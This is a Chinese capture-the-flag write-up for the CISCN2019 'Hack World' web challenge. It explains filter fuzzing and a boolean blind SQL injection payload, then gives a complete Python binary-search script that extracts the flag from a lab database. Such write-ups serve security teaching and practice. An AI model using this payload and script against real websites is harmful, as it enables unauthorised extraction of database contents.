[CISCN2019 华北赛区 Day2 Web1]Hack World
题目链接:[CISCN2019 华北赛区 Day2 Web1]Hack World。
打开环境后如下所示。
尝试输入 1、2、3、4、...,发现仅存在三种结果。
即 1 时,输出 "Hello, glzjin wants a girlfriend."。
2 时,输出 "Do you want to be my girlfriend?"。
其他,输出 "Error Occured When Fetch Result."。
且存在对用户输入的检测。
还有个意义不明的信息。
通过 fuzzing,可以发现后端对什么关键词进行了检测。
因此,这里使用布尔盲注进行读取数据(题目中存在提示,只需要读取 flag 表中的 flag 字段)。
Payload:if(ascii(substr((select(database())),1,1))>99,1,2)。
# 二分法
import requests
url = "http://75073420-9c74-41e5-b9fb-6bfe86d0efc8.node5.buuoj.cn:81/index.php"
flag = ""
i = 0
while True:
i = i + 1
letf = 32
right = 127
while letf < right:
mid = (letf+right) // 2
payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"
data = {"id":payload}
res = requests.post(url=url, data=data).text
if "Hello" in res:
letf = mid + 1
else:
right = mid
if letf != 32:
flag += chr(letf)
print(flag)
else:
break
参考:
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具